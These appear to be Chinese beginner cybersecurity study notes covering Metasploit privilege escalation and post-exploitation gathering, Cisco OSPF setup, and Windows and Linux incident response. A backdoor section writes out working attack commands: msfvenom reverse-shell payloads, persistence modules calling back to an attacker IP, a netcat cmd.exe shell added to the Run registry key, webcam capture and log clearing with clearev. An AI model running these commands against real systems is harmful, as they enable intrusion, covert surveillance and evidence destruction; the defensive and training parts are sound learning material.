网络安全入门day2

目录

一.操作系统权限和密码破解

二.通信常识

三.对后门的简单认识（在kali中）

四.windows应急响应

五.Linux应急响应（kali）

---

一.操作系统权限和密码破解

1.系统权限
  
Windows：system和administrator或者其他

Linux：root或者其他

CPU：
os（操作系统）
ring0（驱动程序）
ring3（大多数软件）

2.操作系统提权：
ms14_058,ms16_016
目标x32位系统
use exploit/windows/local/ms14_058...
show options
set session 1
exploit
如果使用成功会返回一个新的session号

3.目标信息采集：

需要进入到一个sessions里
run post/windows/gather/forensics/xxxxx  // 取证模块

run post/windows/gather/checkvm            //检测是否为虚拟机

run post/windows/gather/enum_services   //查看运行的服务

run post/windows/gather/enum_applications  // 查看电脑安装了哪些应用

run post/windows/gather/enum_shares  //查看共享

run post/windows/gather/dumplinks   //查看最近操作（安装东西）

run post/windows/gather/enum_patches    //查看用户安装了哪些补丁

二.通信常识

1.OSI七层
 ISO-OSI七层模型：

物理层：在线路上传播，光电，电磁波等
数据链路层：用以太网交换机进行数据交换， 定义数据如何格式化，进行编址mac地址
网络层：数据传递，路由信息报文（路由器），选择最优路线访问目标（ip地址和路由协议）
传输层：端口之间通信
会话层：主机和主机之间的通信，可以管理结束程序之间的对话
表示层：数据以不同的方式表示出来，可以加密服务或格式化数据等
应用层：各种程序

2.路由器
以Cisco路由器为例子
基础指令：
en  //进入特权模式
conf t  // 进入全局配置模式
ho R1   //取名R1

优化指令：
no ip domain-lo   //不要查询出错的命令
line con 0   //进入console 0调试
no exec-t   //不要超时把我弹出
logg syn  //命令和弹出的内容换行显示

int [接口]   //进入某个接口进行配置
no sh  //物理开启接口
ip add [ip地址] [子网掩码]   // 配置ip地址

int loo [编号]    //环回口（本地测试）

sh ip int bri   //查看接口的所有信息
sh run    //查看路由器中所有配置

配置三台路由器：
R1
router ospf 1
router-id  1.1.1.1
net 192.168.1.0 0.0.0.255 a 0
net 1.1.1.1 0.0.0.0 a 0
net 13.13.13.0 0.0.0.255 a 0

R2
router os 1
router-id 2.2.2.2
net 2.2.2.2 0.0.0.0 a 0
net 192.168.2.0 0.0.0.255 a 0
net 23.23.23.0 0.0.0.255 a 0

R3(isp)
router os 1
router-id 3.3.3.3
net 3.3.3.3 0.0.0.0 a 0
net 13.13.13.0 0.0.0.255 a 0
net 23.23.23.0 0.0.0.255 a 0

sh ip os nei 查看ospf邻居

三.对后门的简单认识（在kali中）

1. 创建x64木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=【IP地址】 lport=4444 -f exe > msf.exe

run metsvc -A  设定端口上传后门文件，会发现打开了一个新的端口31337

use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set lport 31337
set rhost [对方的ip]
exploit

将指令输入可以让对方连接上你

在session中启动
run persistence -A -S -U -i 60 -p 4321 -r [黑客ip]   //在对方电脑安装一个永久性的后门，并且每隔60s验证一次是否还存活，使用4321端口

2. msf关闭了，下次重开
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 4321
set lhost [自己ip]
exploit

即使sessions -k [id] 过了60s还会回来

3.上传文件也可以安插永久后门（nc）：
进入一个session中
upload /root/nc.exe c:\\

查看注册表里有什么
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

把nc放到自动启动里
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'c:\nc.exe -Ldp 444 -e cmd.exe'

查看代码写的对不对
reg queryval -k  HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc

查看防火墙状态
netsh firewall show opmode

添加一个防火墙规则允许444端口通过
netsh firewall add portopening TCP 444 "FireWall" ENABLE ALL

目标主机重启之后
nc -v [目标ip] 444

4.其他命令
uictl [enable/disable] [keyboard/mouse/all] 开启/停用键盘/鼠标

webcam_list 查看摄像头
webcam_snap 通过摄像头拍照
webcam_stream 通过摄像头开启视频

execute 在目标上执行文件
execute -H -i -f cmd.exe 创建新的隐藏可交互的命令cmd.exe

getpid 获取当前进程的pid
ps 查看活跃进程
migrate [pid] 将meterpreter转移到某个pid中
kill [pid] 杀死某个进程

clearev 清除日志，清除windows里的应用程序，系统日志，安全日志

四.windows应急响应

1.一般的攻击方法
web入侵：
挂马，网页篡改（菠菜，黑帽seo），植入webshell，黑页，暗链等

主机入侵：
病毒木马，勒索病毒，远控后门，系统异常，RDP爆破，SSH爆破，主机漏洞，数据库入侵等

网络攻击：
DDOS/CC攻击，ARP攻击，DNS/HTTP劫持

路由器/交换机攻击：
内网病毒，配置错误，机器本身的漏洞

2. windows应急响应：

日志查看:
eventvwr.msc

文件分析：
临时目录排查
tmp/temp
C:\Users\Administrator\Local Settings\Temp
浏览器相关文件
C:\Users\Administrator\Local Settings\History

最近打开的文件||文件修改时间||hosts文件（在C盘Windows\system32\drivers\etc\hosts）

网络行为排查：
重要的辅助站点：
https://www.virustotal.com/
https://x.threatbook.cn/
https://beian.cndns.com/

网络连接排查
metstat -ano

流量分析
wireshark/burpsuite/charles  

五.Linux应急响应（kali）

1.攻击后会出现的情况：

cpu飙升
服务器卡顿
异常流量
异常网络连接
服务器无法登录
僵尸网络
挖矿
dns服务器报毒

2.应急措施：
ifconfig
top -c
lsof -i -PnR 查看网络通信情况
ps aux | grep [PID] 查看进程信息
lsof -p [PID] 查看进程打开的文件
md5sum [文件名] 计算文件的md5值，如果被别人修改，md5值会发生变化

3.网络行为分析：
who
查看当前用户的登录信息

uname -a
查看系统信息

netstat -ano
所有网络连接

netstat -utnpl
查看带端口情况的

arp -a
查看arp表

4.进程检查
ps aux
ps -ef
top -c
lsof -p [pid]
lsof -i
lsof -c

5.启动项排查
/etc/init.d/
/etc/xinetd.d

查看rc.local文件
/etc/rc.d/rc[0-6].d
/etc/profile.d/

init文件名，系统启动的第一个脚本
init.d目录名，服务启动脚本
rcX.d目录名，

6.计划任务
/etc/crontab
/var/spool/cron/root

crontab -l

crontab -r

crontab -e

7.服务排查

cat /etc/services

1-1024 系统保留，大多数情况只能由root使用
1024-4999 由客户端程序自由分配
5000-65535 由服务端程序自由分配

服务自启动
chkconfig --level 2345 httpd on

0 = 关机
1 = 单用户
2 = 有网络连接的多用户命令行模式
3 = 无网络连接的多用户命令行模式
4 = 不可用
5 = 带图形界面的多用户模式
6 = 重新启动

chkconfig --list 查看服务自启动状态
--del

8.文件检查

rpm -Va 查看所有软件包的变化情况

/tmp
/etc/init.d
/usr/bin
/usr/sbin
/root
/boot
/bin
/sbin
/etc/passwd
/etc/shadow

ls -alt
按时间排序

find / *.py -perm 4777
ls -al /tmp | grep "Feb 10"

9.帐号检查

w
查看某一时刻用户行为

cat /etc/passwd
cat /etc/shadow

less /etc/passwd

usermod -L [user]
userdel [user]
userdel -r [user]

删除用户之后，/home目录下的用户名文件夹也删了

last 查看成功的登录 /var/log/wtmp
lastb 登录失败情况/var/log/btmp
lastlog 查看上一次用户登录情况 /var/log/lastlog

last -x reboot 查看重启记录
last -x shotdown 查看关机记录

10.历史命令检查

.bash_history

history 查看历史命令
history -c  清空历史命令

cat /etc/hosts

处置命令：
chattr +i [目标文件]
chmod 000 [目标文件]

日志位置：
/var/log/

日志配置文件
/etc/rsyslog.conf